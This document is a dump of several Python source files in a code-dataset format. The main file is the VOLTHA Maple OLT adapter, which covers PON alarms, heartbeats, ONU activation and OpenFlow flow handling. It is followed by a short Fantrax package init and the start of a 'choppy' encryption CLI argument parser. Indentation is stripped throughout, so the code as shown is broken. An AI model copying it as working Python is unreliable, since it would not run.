# key: {'device_id': <int>, 'pon_ni': <int>}
pass
elif _object == 'flow_map':
# key: {'device_id': <int>, 'pon_ni': <int>}
pass
def remote_report_alarm(self, _object, key, alarm, status, priority,
alarm_data=None):
log.info('received-alarm-msg',
object=_object,
key=key,
alarm=alarm,
status=status,
priority=priority,
alarm_data=alarm_data)
id = 'voltha.{}.{}.{}'.format(self.adapter_name, self.device_id, _object)
description = '{} Alarm - {} - {}'.format(_object.upper(), alarm.upper(),
'Raised' if status else 'Cleared')
if priority == 'low':
severity = AlarmEventSeverity.MINOR
elif priority == 'medium':
severity = AlarmEventSeverity.MAJOR
elif priority == 'high':
severity = AlarmEventSeverity.CRITICAL
else:
severity = AlarmEventSeverity.INDETERMINATE
try:
ts = arrow.utcnow().timestamp
alarm_event = self.adapter_agent.create_alarm(
id=id,
resource_id=str(key),
type=AlarmEventType.EQUIPMENT,
category=AlarmEventCategory.PON,
severity=severity,
state=AlarmEventState.RAISED if status else AlarmEventState.CLEARED,
description=description,
context=alarm_data,
raised_ts = ts)
self.adapter_agent.submit_alarm(self.device_id, alarm_event)
except Exception as e:
log.exception('failed-to-submit-alarm', e=e)
# take action based on alarm type, only pon_ni and onu objects report alarms
        if _object == 'pon_ni':
# key: {'device_id': <int>, 'pon_ni': <int>}
# alarm: 'los'
# status: <False|True>
pass
        elif _object == 'onu':
# key: {'device_id': <int>, 'pon_ni': <int>, 'onu_id': <int>}
# alarm: <'los'|'lob'|'lopc_miss'|'los_mic_err'|'dow'|'sf'|'sd'|'suf'|'df'|'tiw'|'looc'|'dg'>
# status: <False|True>
pass
@implementer(IAdapterInterface)
class MapleOltAdapter(object):
name = 'maple_olt'
supported_device_types = [
DeviceType(
id=name,
adapter=name,
accepts_bulk_flow_update=True
)
]
def __init__(self, adapter_agent, config):
self.adapter_agent = adapter_agent
self.config = config
self.descriptor = Adapter(
id=self.name,
vendor='Voltha project',
version='0.4',
config=AdapterConfig(log_level=LogLevel.INFO)
)
self.devices_handlers = dict() # device_id -> MapleOltHandler()
self.logical_device_id_to_root_device_id = dict()
# register for adapter messages
self.adapter_agent.register_for_inter_adapter_messages()
def start(self):
log.debug('starting')
log.info('started')
def stop(self):
log.debug('stopping')
log.info('stopped')
def adapter_descriptor(self):
return self.descriptor
def device_types(self):
return DeviceTypes(items=self.supported_device_types)
def health(self):
return HealthStatus(state=HealthStatus.HealthState.HEALTHY)
def change_master_state(self, master):
raise NotImplementedError()
def update_pm_config(self, device, pm_config):
log.info("adapter-update-pm-config", device=device, pm_config=pm_config)
handler = self.devices_handlers[device.id]
handler.update_pm_metrics(device, pm_config)
def adopt_device(self, device):
log.info("adopt-device", device=device)
self.devices_handlers[device.id] = MapleOltHandler(self, device.id)
reactor.callLater(0, self.devices_handlers[device.id].activate, device)
return device
def reconcile_device(self, device):
raise NotImplementedError()
def abandon_device(self, device):
raise NotImplementedError()
def disable_device(self, device):
raise NotImplementedError()
def reenable_device(self, device):
raise NotImplementedError()
def reboot_device(self, device):
raise NotImplementedError()
def download_image(self, device, request):
raise NotImplementedError()
def get_image_download_status(self, device, request):
raise NotImplementedError()
def cancel_image_download(self, device, request):
raise NotImplementedError()
def activate_image_update(self, device, request):
raise NotImplementedError()
def revert_image_update(self, device, request):
raise NotImplementedError()
def self_test_device(self, device):
"""
        This is called to self-test a device based on a NBI call.
:param device: A Voltha.Device object.
:return: Will return result of self test
"""
log.info('self-test-device', device=device.id)
raise NotImplementedError()
def delete_device(self, device):
raise NotImplementedError()
def get_device_details(self, device):
raise NotImplementedError()
def update_flows_bulk(self, device, flows, groups):
log.info('bulk-flow-update', device_id=device.id,
flows=flows, groups=groups)
assert len(groups.items) == 0, "Cannot yet deal with groups"
handler = self.devices_handlers[device.id]
return handler.update_flow_table(flows.items, device)
def update_flows_incrementally(self, device, flow_changes, group_changes):
raise NotImplementedError()
def send_proxied_message(self, proxy_address, msg):
log.info('send-proxied-message', proxy_address=proxy_address, msg=msg)
handler = self.devices_handlers[proxy_address.device_id]
handler.send_proxied_message(proxy_address, msg)
def receive_proxied_message(self, proxy_address, msg):
raise NotImplementedError()
def receive_packet_out(self, logical_device_id, egress_port_no, msg):
def ldi_to_di(ldi):
di = self.logical_device_id_to_root_device_id.get(ldi)
if di is None:
logical_device = self.adapter_agent.get_logical_device(ldi)
di = logical_device.root_device_id
self.logical_device_id_to_root_device_id[ldi] = di
return di
device_id = ldi_to_di(logical_device_id)
handler = self.devices_handlers[device_id]
handler.packet_out(egress_port_no, msg)
def receive_inter_adapter_message(self, msg):
pass
def create_interface(self, device, data):
raise NotImplementedError()
def update_interface(self, device, data):
raise NotImplementedError()
def remove_interface(self, device, data):
raise NotImplementedError()
def receive_onu_detect_state(self, device_id, state):
raise NotImplementedError()
def create_tcont(self, device, tcont_data, traffic_descriptor_data):
raise NotImplementedError()
def update_tcont(self, device, tcont_data, traffic_descriptor_data):
raise NotImplementedError()
def remove_tcont(self, device, tcont_data, traffic_descriptor_data):
raise NotImplementedError()
def create_gemport(self, device, data):
raise NotImplementedError()
def update_gemport(self, device, data):
raise NotImplementedError()
def remove_gemport(self, device, data):
raise NotImplementedError()
def create_multicast_gemport(self, device, data):
raise NotImplementedError()
def update_multicast_gemport(self, device, data):
raise NotImplementedError()
def remove_multicast_gemport(self, device, data):
raise NotImplementedError()
def create_multicast_distribution_set(self, device, data):
raise NotImplementedError()
def update_multicast_distribution_set(self, device, data):
raise NotImplementedError()
def remove_multicast_distribution_set(self, device, data):
raise NotImplementedError()
def suppress_alarm(self, filter):
raise NotImplementedError()
def unsuppress_alarm(self, filter):
raise NotImplementedError()
class MaplePBClientFactory(pb.PBClientFactory, ReconnectingClientFactory):
channel = None
maxDelay = 60
initialDelay = 15
def clientConnectionMade(self, broker):
log.info('pb-client-connection-made')
pb.PBClientFactory.clientConnectionMade(self, broker)
ReconnectingClientFactory.resetDelay(self)
def clientConnectionLost(self, connector, reason, reconnecting=0):
log.info('pb-client-connection-lost')
pb.PBClientFactory.clientConnectionLost(self, connector, reason,
reconnecting=1)
ReconnectingClientFactory.clientConnectionLost(self, connector, reason)
log.info('pb-client-connection-lost-retrying')
def clientConnectionFailed(self, connector, reason):
log.info('pb-client-connection-failed')
pb.PBClientFactory.clientConnectionFailed(self, connector, reason)
ReconnectingClientFactory.clientConnectionFailed(self, connector,
reason)
log.info('pb-client-connection-failed-retrying')
def disconnect(self, stopTrying=0):
if stopTrying:
ReconnectingClientFactory.stopTrying(self)
pb.PBClientFactory.disconnect(self)
def channel_disconnected(self, channel):
log.info('pb-channel-disconnected', channel=channel)
self.disconnect()
@inlineCallbacks
def getChannel(self):
if self.channel is None:
try:
self.channel = yield self.getRootObject()
self.channel.notifyOnDisconnect(self.channel_disconnected)
except Exception as e:
log.info('pb-client-failed-to-get-channel', exc=str(e))
self.channel = None
returnValue(self.channel)
class MapleOltHandler(object):
def __init__(self, adapter, device_id):
self.adapter = adapter
self.adapter_agent = adapter.adapter_agent
self.device_id = device_id
self.log = structlog.get_logger(device_id=device_id)
self.io_port = None
self.logical_device_id = None
self.interface = registry('main').get_args().interface
self.pbc_factory = MaplePBClientFactory()
self.pbc_port = 24498
self.tx_id = 0
self.onu_discovered_queue = DeferredQueue()
self.rx_handler = MapleOltRxHandler(self.device_id, self.adapter, self.onu_discovered_queue)
self.heartbeat_count = 0
self.heartbeat_miss = 0
self.heartbeat_interval = 1
self.heartbeat_failed_limit = 3
self.command_timeout = 5
self.pm_metrics = None
self.onus = {}
def __del__(self):
if self.io_port is not None:
registry('frameio').close_port(self.io_port)
def get_channel(self):
return self.pbc_factory.getChannel()
def get_proxy_channel_id_from_onu(self, onu_id):
return onu_id << 4
def get_onu_from_channel_id(self, channel_id):
return channel_id >> 4
def get_tunnel_tag_from_onu(self, onu):
return 1024 + (onu * 16)
def get_onu_from_tunnel_tag(self, tunnel_tag):
return (tunnel_tag - 1024) / 16
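    # Illustration of the mapping helpers above (numbers derived from the
    # formulas, not taken from the original source): onu_id=2 maps to proxy
    # channel_id 2 << 4 = 32 and tunnel tag 1024 + 2*16 = 1056, and the two
    # inverse helpers recover onu_id=2 from either value.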
def get_new_onu_id(self, vendor, vendor_specific):
onu_id = None
for i in range(0, 63):
if i not in self.onus:
onu_id = i
break
if onu_id is not None:
self.onus[onu_id] = {'onu_id': onu_id,
'vendor': vendor,
'vendor_specific': vendor_specific}
return onu_id
def onu_exists(self, onu_id):
if onu_id in self.onus:
self.log.info('onu-exists',
onu_id=onu_id,
vendor=self.onus[onu_id]['vendor'],
vendor_specific=self.onus[onu_id]['vendor_specific'])
return self.onus[onu_id]['vendor'], self.onus[onu_id]['vendor_specific']
else:
self.log.info('onu-does-not-exist', onu_id=onu_id)
return None, None
def onu_serial_exists(self, sn_vendor, sn_vendor_specific):
for key, value in self.onus.iteritems():
if sn_vendor in value.itervalues() and sn_vendor_specific in value.itervalues():
self.log.info('onu-serial-number-exists',
onu_id=value['onu_id'],
vendor=sn_vendor,
vendor_specific=sn_vendor_specific,
onus=self.onus)
return value['onu_id']
self.log.info('onu-serial-number-does-not-exist',
vendor=sn_vendor,
vendor_specific=sn_vendor_specific,
onus=self.onus)
return None
@inlineCallbacks
def send_set_remote(self):
srv_ip = self.rx_handler.get_ip()
srv_port = self.rx_handler.get_port()
self.log.info('setting-remote-ip-port', ip=srv_ip, port=srv_port)
try:
remote = yield self.get_channel()
data = yield remote.callRemote('set_remote', srv_ip, srv_port)
self.log.info('set-remote', data=data, ip=srv_ip, port=srv_port)
except Exception as e:
self.log.info('set-remote-exception', exc=str(e))
@inlineCallbacks
def send_config_classifier(self, olt_no, etype, ip_proto=None,
dst_port=None):
self.log.info('configuring-classifier',
olt=olt_no,
etype=etype,
ip_proto=ip_proto,
dst_port=dst_port)
try:
remote = yield self.get_channel()
data = yield remote.callRemote('config_classifier',
olt_no,
etype,
ip_proto,
dst_port)
self.log.info('configured-classifier', data=data)
except Exception as e:
self.log.info('config-classifier-exception', exc=str(e))
@inlineCallbacks
def send_config_acflow(self, olt_no, onu_no, etype, ip_proto=None,
dst_port=None):
self.log.info('configuring-acflow',
olt=olt_no,
onu=onu_no,
etype=etype,
ip_proto=ip_proto,
dst_port=dst_port)
try:
remote = yield self.get_channel()
data = yield remote.callRemote('config_acflow',
olt_no,
onu_no,
etype,
ip_proto,
dst_port)
self.log.info('configured-acflow', data=data)
except Exception as e:
self.log.info('config-acflow-exception', exc=str(e))
@inlineCallbacks
def send_connect_olt(self, olt_no):
self.log.info('connecting-to-olt', olt=olt_no)
try:
remote = yield self.get_channel()
data = yield remote.callRemote('connect_olt', olt_no)
self.log.info('connected-to-olt', data=data)
except Exception as e:
self.log.info('connect-olt-exception', exc=str(e))
@inlineCallbacks
def send_activate_olt(self, olt_no):
self.log.info('activating-olt', olt=olt_no)
try:
remote = yield self.get_channel()
data = yield remote.callRemote('activate_olt', olt_no)
self.log.info('activated-olt', data=data)
except Exception as e:
self.log.info('activate-olt-exception', exc=str(e))
@inlineCallbacks
def send_create_onu(self, olt_no, onu_no, serial_no, vendor_no):
self.log.info('creating-onu',
olt=olt_no,
onu=onu_no,
serial=serial_no,
vendor=vendor_no)
try:
remote = yield self.get_channel()
data = yield remote.callRemote('create_onu',
olt_no,
onu_no,
serial_no,
vendor_no)
self.log.info('created-onu', data=data)
except Exception as e:
self.log.info('create-onu-exception', exc=str(e))
@inlineCallbacks
def send_configure_alloc_id(self, olt_no, onu_no, alloc_id):
self.log.info('configuring-alloc-id',
olt=olt_no,
onu=onu_no,
alloc_id=alloc_id)
try:
remote = yield self.get_channel()
data = yield remote.callRemote('configure_alloc_id',
olt_no,
onu_no,
alloc_id)
self.log.info('configured-alloc-id', data=data)
except Exception as e:
self.log.info('configure-alloc-id-exception', exc=str(e))
@inlineCallbacks
def send_configure_unicast_gem(self, olt_no, onu_no, uni_gem):
self.log.info('configuring-unicast-gem',
olt=olt_no,
onu=onu_no,
unicast_gem_port=uni_gem)
try:
remote = yield self.get_channel()
data = yield remote.callRemote('configure_unicast_gem',
olt_no,
onu_no,
uni_gem)
self.log.info('configured-unicast-gem', data=data)
except Exception as e:
self.log.info('configure-unicast-gem-exception', exc=str(e))
@inlineCallbacks
def send_configure_multicast_gem(self, olt_no, onu_no, multi_gem):
self.log.info('configuring-multicast-gem',
olt=olt_no,
onu=onu_no,
multicast_gem_port=multi_gem)
try:
remote = yield self.get_channel()
data = yield remote.callRemote('configure_multicast_gem',
olt_no,
onu_no,
multi_gem)
self.log.info('configured-multicast-gem', data=data)
except Exception as e:
self.log.info('configure-multicast-gem-exception', exc=str(e))
@inlineCallbacks
def send_configure_onu(self, olt_no, onu_no, alloc_id, uni_gem, multi_gem):
self.log.info('configuring-onu',
olt=olt_no,
onu=onu_no,
alloc_id=alloc_id,
unicast_gem_port=uni_gem,
multicast_gem_port=multi_gem)
try:
remote = yield self.get_channel()
data = yield remote.callRemote('configure_onu',
olt_no,
onu_no,
alloc_id,
uni_gem,
multi_gem)
self.log.info('configured-onu', data=data)
except Exception as e:
self.log.info('configure-onu-exception', exc=str(e))
@inlineCallbacks
def send_activate_onu(self, olt_no, onu_no):
self.log.info('activating-onu', olt=olt_no, onu=onu_no)
try:
remote = yield self.get_channel()
data = yield remote.callRemote('activate_onu', olt_no, onu_no)
self.log.info('activated-onu', data=data)
except Exception as e:
self.log.info('activate-onu-exception', exc=str(e))
@inlineCallbacks
def heartbeat(self, device_id, state='run'):
"""Heartbeat OLT hardware
Call PB remote method 'heartbeat' to verify connectivity to OLT
hardware. If heartbeat missed self.heartbeat_failed_limit times OLT
adapter is set FAILED/UNREACHABLE.
No further action from VOLTHA core is expected as result of heartbeat
failure. Heartbeat continues following failure and once connectivity is
restored adapter state will be set to ACTIVE/REACHABLE
Arguments:
device_id: adapter device id
state: desired state (stop, start, run)
"""
self.log.debug('olt-heartbeat', device=device_id, state=state,
count=self.heartbeat_count)
def add_timeout(d, duration):
return reactor.callLater(duration, d.cancel)
def cancel_timeout(t):
if t.active():
t.cancel()
self.log.debug('olt-heartbeat-timeout-cancelled')
def heartbeat_alarm(device_id, status, heartbeat_misses=0):
try:
ts = arrow.utcnow().timestamp
alarm_data = {'heartbeats_missed':str(heartbeat_misses)}
alarm_event = self.adapter_agent.create_alarm(
id='voltha.{}.{}.olt'.format(self.adapter.name, device_id),
resource_id='olt',
type=AlarmEventType.EQUIPMENT,
category=AlarmEventCategory.PON,
severity=AlarmEventSeverity.CRITICAL,
state=AlarmEventState.RAISED if status else
AlarmEventState.CLEARED,
description='OLT Alarm - Heartbeat - {}'.format('Raised'
if status
else 'Cleared'),
context=alarm_data,
raised_ts = ts)
self.adapter_agent.submit_alarm(device_id, alarm_event)
except Exception as e:
log.exception('failed-to-submit-alarm', e=e)
if state == 'stop':
return
if state == 'start':
self.heartbeat_count = 0
self.heartbeat_miss = 0
try:
d = self.get_channel()
timeout = add_timeout(d, self.command_timeout)
remote = yield d
cancel_timeout(timeout)
d = remote.callRemote('heartbeat', self.heartbeat_count)
timeout = add_timeout(d, self.command_timeout)
data = yield d
cancel_timeout(timeout)
except Exception as e:
data = -1
self.log.info('olt-heartbeat-exception', data=data,
count=self.heartbeat_miss, exc=str(e))
if data != self.heartbeat_count:
# something is not right
self.heartbeat_miss += 1
self.log.info('olt-heartbeat-miss', data=data,
count=self.heartbeat_count, miss=self.heartbeat_miss)
else:
if self.heartbeat_miss > 0:
self.heartbeat_miss = 0
_device = self.adapter_agent.get_device(device_id)
_device.connect_status = ConnectStatus.REACHABLE
_device.oper_status = OperStatus.ACTIVE
_device.reason = ''
self.adapter_agent.update_device(_device)
heartbeat_alarm(device_id, 0)
_device = self.adapter_agent.get_device(device_id)
if (self.heartbeat_miss >= self.heartbeat_failed_limit) and \
(_device.connect_status == ConnectStatus.REACHABLE):
self.log.info('olt-heartbeat-failed', data=data,
count=self.heartbeat_miss)
_device = self.adapter_agent.get_device(device_id)
_device.connect_status = ConnectStatus.UNREACHABLE
_device.oper_status = OperStatus.FAILED
_device.reason = 'Lost connectivity to OLT'
self.adapter_agent.update_device(_device)
heartbeat_alarm(device_id, 1, self.heartbeat_miss)
self.heartbeat_count += 1
reactor.callLater(self.heartbeat_interval, self.heartbeat, device_id)
@inlineCallbacks
def arrive_onu(self):
self.log.info('arrive-onu waiting')
_data = yield self.onu_discovered_queue.get()
ok_to_arrive = False
olt_id = _data['_device_id']
pon_id = _data['_pon_id']
onu_id = self.onu_serial_exists(_data['_vendor_id'], _data['_vendor_specific'])
self.log.info('arrive-onu-detected', olt_id=olt_id, pon_ni=pon_id, onu_data=_data, onus=self.onus)
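# An onu_id of 65535 is treated below as "not yet assigned" and triggers allocation of a new id.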
if _data['onu_id'] == 65535:
if onu_id is not None:
self.log.info('onu-activation-already-in-progress',
vendor=_data['_vendor_id'],
vendor_specific=_data['_vendor_specific'],
onus=self.onus)
else:
onu_id = self.get_new_onu_id(_data['_vendor_id'],
_data['_vendor_specific'])
self.log.info('assigned-onu-id',
onu_id=onu_id,
vendor=_data['_vendor_id'],
vendor_specific=_data['_vendor_specific'],
onus=self.onus)
ok_to_arrive = True
else:
vendor_id, vendor_specific = self.onu_exists(_data['onu_id'])
if vendor_id is not None and vendor_id == _data['_vendor_id'] and \
vendor_specific is not None and vendor_specific == _data['_vendor_specific']:
onu_id = _data['onu_id']
self.log.info('re-discovered-existing-onu',
onu_id=onu_id,
vendor=_data['_vendor_id'],
vendor_specific=_data['_vendor_specific'])
ok_to_arrive = True
else:
self.log.info('onu-id-serial-number-mismatch-detected',
onu_id=onu_id,
vendor_id=vendor_id,
new_vendor_id=_data['_vendor_id'],
vendor_specific=vendor_specific,
new_vendor_specific=_data['_vendor_specific'])
if onu_id is not None and ok_to_arrive:
self.log.info('arriving-onu', onu_id=onu_id)
tunnel_tag = self.get_tunnel_tag_from_onu(onu_id)
yield self.send_create_onu(pon_id,
onu_id,
_data['_vendor_id'],
_data['_vendor_specific'])
yield self.send_configure_alloc_id(pon_id, onu_id, tunnel_tag)
yield self.send_configure_unicast_gem(pon_id, onu_id, tunnel_tag)
yield self.send_configure_multicast_gem(pon_id, onu_id, 4000)
yield self.send_activate_onu(pon_id, onu_id)
self.adapter_agent.child_device_detected(
parent_device_id=self.device_id,
parent_port_no=100,
child_device_type='broadcom_onu',
proxy_address=Device.ProxyAddress(
device_id=self.device_id,
channel_id=self.get_proxy_channel_id_from_onu(onu_id), # c-vid
onu_id=onu_id,
onu_session_id=tunnel_tag # tunnel_tag/gem_port, alloc_id
),
admin_state=AdminState.ENABLED,
vlan=tunnel_tag,
serial_number=_data['_vendor_specific']
)
reactor.callLater(1, self.arrive_onu)
@inlineCallbacks
def activate(self, device):
self.log.info('activating-olt', device=device)
while self.onu_discovered_queue.pending:
_ = yield self.onu_discovered_queue.get()
if self.logical_device_id is None:
if not device.ipv4_address:
device.oper_status = OperStatus.FAILED
device.reason = 'No ipv4_address field provided'
self.adapter_agent.update_device(device)
return
device.root = True
device.vendor = 'Broadcom'
device.model = 'bcm68620'
device.serial_number = device.ipv4_address
self.adapter_agent.update_device(device)
nni_port = Port(
port_no=1,
label='NNI facing Ethernet port',
type=Port.ETHERNET_NNI,
admin_state=AdminState.ENABLED,
oper_status=OperStatus.ACTIVE
)
self.adapter_agent.add_port(device.id, nni_port)
self.adapter_agent.add_port(device.id, Port(
port_no=100,
label='PON port',
type=Port.PON_OLT,
admin_state=AdminState.ENABLED,
oper_status=OperStatus.ACTIVE
))
ld = LogicalDevice(
# not setting id and datapath_id will let the adapter
# agent pick id
desc=ofp_desc(
mfr_desc='cord project',
hw_desc='n/a',
sw_desc='logical device for Maple-based PON',
serial_num=uuid4().hex,
dp_desc='n/a'
),
switch_features=ofp_switch_features(
n_buffers=256, # TODO fake for now
n_tables=2, # TODO ditto
capabilities=( # TODO and ditto
OFPC_FLOW_STATS
| OFPC_TABLE_STATS
| OFPC_PORT_STATS
| OFPC_GROUP_STATS
)
),
root_device_id=device.id
)
ld_initialized = self.adapter_agent.create_logical_device(ld)
cap = OFPPF_1GB_FD | OFPPF_FIBER
self.adapter_agent.add_logical_port(ld_initialized.id, LogicalPort(
id='nni',
ofp_port=ofp_port(
port_no=0, # is 0 OK?
hw_addr=mac_str_to_tuple('00:00:00:00:00:%02x' % 129),
name='nni',
config=0,
state=OFPPS_LIVE,
curr=cap,
advertised=cap,
peer=cap,
curr_speed=OFPPF_1GB_FD,
max_speed=OFPPF_1GB_FD
),
device_id=device.id,
device_port_no=nni_port.port_no,
root_port=True
))
device = self.adapter_agent.get_device(device.id)
device.parent_id = ld_initialized.id
device.connect_status = ConnectStatus.UNREACHABLE
device.oper_status = OperStatus.ACTIVATING
self.adapter_agent.update_device(device)
self.logical_device_id = ld_initialized.id
device = self.adapter_agent.get_device(device.id)
self.log.info('initiating-connection-to-olt',
device_id=device.id,
ipv4=device.ipv4_address,
port=self.pbc_port)
try:
reactor.connectTCP(device.ipv4_address, self.pbc_port, self.pbc_factory)
device.connect_status = ConnectStatus.REACHABLE
device.oper_status = OperStatus.ACTIVE
device.reason = ''
self.adapter_agent.update_device(device)
except Exception as e:
self.log.info('get-channel-exception', exc=str(e))
device = self.adapter_agent.get_device(device.id)
device.oper_status = OperStatus.FAILED
device.reason = 'Failed to connect to OLT'
self.adapter_agent.update_device(device)
self.pbc_factory.stopTrying()
reactor.callLater(5, self.activate, device)
return
device = self.adapter_agent.get_device(device.id)
self.log.info('connected-to-olt',
device_id=device.id,
ipv4=device.ipv4_address,
port=self.pbc_port)
reactor.callLater(0, self.heartbeat, device.id, state='start')
yield self.send_set_remote()
yield self.send_connect_olt(0)
yield self.send_activate_olt(0)
# Open the frameio port to receive in-band packet_in messages
self.log.info('registering-frameio')
self.io_port = registry('frameio').open_port(
self.interface, self.rcv_io, is_inband_frame)
# Finally set the initial PM configuration for this device
# TODO: if arrive_onu not working, the following PM stuff was commented out during testing
self.pm_metrics = MapleOltPmMetrics(device)
pm_config = self.pm_metrics.make_proto()
self.log.info("initial-pm-config", pm_config=pm_config)
self.adapter_agent.update_device_pm_config(pm_config, init=True)
# Apply the PM configuration
self.update_pm_metrics(device, pm_config)
reactor.callLater(1, self.arrive_onu)
self.log.info('olt-activated', device=device)
def rcv_io(self, port, frame):
self.log.info('received', iface_name=port.iface_name,
frame_len=len(frame))
pkt = Ether(frame)
if pkt.haslayer(Dot1Q):
outer_shim = pkt.getlayer(Dot1Q)
if isinstance(outer_shim.payload, Dot1Q):
inner_shim = outer_shim.payload
cvid = inner_shim.vlan
logical_port = cvid
popped_frame = (
Ether(src=pkt.src, dst=pkt.dst, type=inner_shim.type) /
inner_shim.payload
)
kw = dict(
logical_device_id=self.logical_device_id,
logical_port_no=logical_port,
)
self.log.info('sending-packet-in', **kw)
self.adapter_agent.send_packet_in(
packet=str(popped_frame), **kw)
@inlineCallbacks
def update_flow_table(self, flows, device):
self.log.info('bulk-flow-update', device_id=device.id, flows=flows)
def is_downstream(port):
return not is_upstream(port)
def is_upstream(port):
return port == 100 # Need a better way
for flow in flows:
_type = None
_ip_proto = None
_port = None
_vlan_vid = None
_udp_dst = None
_udp_src = None
_ipv4_dst = None
_ipv4_src = None
_metadata = None
_output = None
_push_tpid = None
_field = None
try:
_in_port = fd.get_in_port(flow)
assert _in_port is not None
if is_downstream(_in_port):
self.log.info('downstream-flow')
elif is_upstream(_in_port):
self.log.info('upstream-flow')
else:
raise Exception('port should be 1 or 2 by our convention')
_out_port = fd.get_out_port(flow) # may be None
self.log.info('out-port', out_port=_out_port)
for field in fd.get_ofb_fields(flow):
if field.type == fd.ETH_TYPE:
_type = field.eth_type
self.log.info('field-type-eth-type',
eth_type=_type)
elif field.type == fd.IP_PROTO:
_ip_proto = field.ip_proto
self.log.info('field-type-ip-proto',
ip_proto=_ip_proto)
elif field.type == fd.IN_PORT:
_port = field.port
self.log.info('field-type-in-port',
in_port=_port)
elif field.type == fd.VLAN_VID:
_vlan_vid = field.vlan_vid & 0xfff
self.log.info('field-type-vlan-vid',
vlan=_vlan_vid)
elif field.type == fd.VLAN_PCP:
_vlan_pcp = field.vlan_pcp
self.log.info('field-type-vlan-pcp',
pcp=_vlan_pcp)
elif field.type == fd.UDP_DST:
_udp_dst = field.udp_dst
self.log.info('field-type-udp-dst',
udp_dst=_udp_dst)
elif field.type == fd.UDP_SRC:
_udp_src = field.udp_src
self.log.info('field-type-udp-src',
udp_src=_udp_src)
elif field.type == fd.IPV4_DST:
_ipv4_dst = field.ipv4_dst
self.log.info('field-type-ipv4-dst',
ipv4_dst=_ipv4_dst)
elif field.type == fd.IPV4_SRC:
_ipv4_src = field.ipv4_src
self.log.info('field-type-ipv4-src',
ipv4_src=_ipv4_src)
elif field.type == fd.METADATA:
_metadata = field.table_metadata
self.log.info('field-type-metadata',
metadata=_metadata)
else:
raise NotImplementedError('field.type={}'.format(
field.type))
for action in fd.get_actions(flow):
if action.type == fd.OUTPUT:
_output = action.output.port
self.log.info('action-type-output',
output=_output, in_port=_in_port)
elif action.type == fd.POP_VLAN:
self.log.info('action-type-pop-vlan',
in_port=_in_port)
elif action.type == fd.PUSH_VLAN:
_push_tpid = action.push.ethertype
self.log.info('action-type-push-vlan',
push_tpid=_push_tpid, in_port=_in_port)
if action.push.ethertype != 0x8100:
self.log.error('unhandled-tpid',
ethertype=action.push.ethertype)
elif action.type == fd.SET_FIELD:
_field = action.set_field.field.ofb_field
assert (action.set_field.field.oxm_class ==
OFPXMC_OPENFLOW_BASIC)
self.log.info('action-type-set-field',
field=_field, in_port=_in_port)
if _field.type == fd.VLAN_VID:
self.log.info('set-field-type-vlan-vid',
vlan_vid=_field.vlan_vid & 0xfff)
else:
self.log.error('unsupported-action-set-field-type',
field_type=_field.type)
else:
self.log.error('unsupported-action-type',
action_type=action.type, in_port=_in_port)
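# Trap upstream control traffic: EAPOL (0x888e), or IPv4 (0x0800) carrying IGMP (proto 2) or UDP (proto 17, e.g. DHCP).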
if is_upstream(_in_port) and \
(_type == 0x888e or
(_type == 0x800 and (_ip_proto == 2 or _ip_proto == 17))):
yield self.send_config_classifier(0, _type, _ip_proto, _udp_dst)
yield self.send_config_acflow(0, _in_port, _type, _ip_proto, _udp_dst)
except Exception as e:
self.log.exception('failed-to-install-flow', e=e, flow=flow)
@inlineCallbacks
def send_proxied_message(self, proxy_address, msg):
if isinstance(msg, Packet):
msg = str(msg)
self.log.info('send-proxied-message',
proxy_address=proxy_address.channel_id,
msg=msg)
try:
remote = yield self.get_channel()
yield remote.callRemote("send_omci",
0,
0,
self.get_onu_from_channel_id(proxy_address.channel_id),
msg)
onu, rmsg = yield self.rx_handler.receive_omci_msg()
self.adapter_agent.receive_proxied_message(proxy_address, rmsg)
except Exception as e:
self.log.info('send-proxied_message-exception', exc=str(e))
def packet_out(self, egress_port, msg):
self.log.debug('sending-packet-out',
egress_port=egress_port,
msg_hex=hexify(msg))
pkt = Ether(msg)
out_pkt = (
Ether(src=pkt.src, dst=pkt.dst) /
Dot1Q(vlan=4091) /
Dot1Q(vlan=egress_port, type=pkt.type) /
pkt.payload
)
self.io_port.send(str(out_pkt))
@inlineCallbacks
def update_pm_metrics(self, device, pm_config):
self.log.info('update-pm-metrics', device_id=device.id,
pm_config=pm_config)
remote = yield self.get_channel()
self.pm_metrics.update(device, pm_config, remote)
|
py | 1a49efa3f1257ab61b03d064009f6d4135060d88 | from .fantrax import Fantrax
from .user import FantraxUser
from .league import League
from .roster import Roster
from .player import Player
from .constants import URL, VERSION, FANTRAX_TOKEN
from .exceptions import FantraxAPIKeyMissingError, FantraxRequestError, \
FantraxConnectionError, FantraxRosterError
|
py | 1a49f094a015b2cc297025fb129931d713580267 | #! usr/bin/env/ python3
"""Parser for CLI user options"""
import argparse
import getpass
import os
import sys
from choppy.version import VERSION
# ------------------------------------------------------------------------------
def confirm_directory(subdir):
if os.path.exists(subdir):
if not os.path.isdir(subdir):
return False
else:
os.mkdir(subdir)
return True
def validate_directory(user_dir):
user_input = user_dir[:]
user_dir = os.path.abspath(user_dir)
status = confirm_directory(user_dir)
if status:
return user_dir
else:
msg = 'Unable to validate output directory: {}'.format(user_input)
raise argparse.ArgumentTypeError(msg)
def load_pw_options(subcmd, pw_only=False):
"""Initializes key and password input options.
Args:
subcmd: Argparse sub_parser instance
pw_only: bool - flag to alter help text
"""
if pw_only:
grp_heading = 'Password Input'
i_help = 'file containing password for key derivation'
else:
grp_heading = 'Key / Password Input'
i_help = 'file containing key or password'
pwgrp = subcmd.add_argument_group(grp_heading)
pwgrp.add_argument(
'-i', type=argparse.FileType('rb'),
dest='kp_file', metavar='(k|pw) infile', help=i_help)
pwgrp.add_argument(
'-s', '--salt', type=argparse.FileType('rb'), metavar='salt-file',
help='file containing salt for key derivation - required for use with password')
pwgrp.add_argument(
'-t', '--iterations', type=int, default=10**5, metavar='n',
help='perform n iterations in key derivation - defaults to 100,000')
def load_keypass_options(subcmd, pfx):
"""Initializes key and password selection options.
Args:
subcmd: Argparse sub_parser instance
pfx: str - str prefix to designate encrypt or decrypt in help text
"""
keypass_grp = subcmd.add_argument_group('Key / Password Select')
kpg = keypass_grp.add_mutually_exclusive_group(required=True)
kpg.add_argument(
'--use-key', action='store_true', dest='use_key',
help='enables usage of key for {}cryption - enter key in secure prompt or specify file with -i'.format(pfx))
kpg.add_argument(
'--use-pw', action='store_true', dest='use_pw',
help='enables usage of password, salt, iterations for {}cryption - enter pw in secure prompt or specify file with -i'.format(pfx))
load_pw_options(subcmd)
def parse_arguments():
"""Parse command line arguments."""
parser = argparse.ArgumentParser(
prog='choppy', description='chop -> encrypt -> (?) -> decrypt -> merge',
allow_abbrev=False)
parser.set_defaults(kw='', pw='')
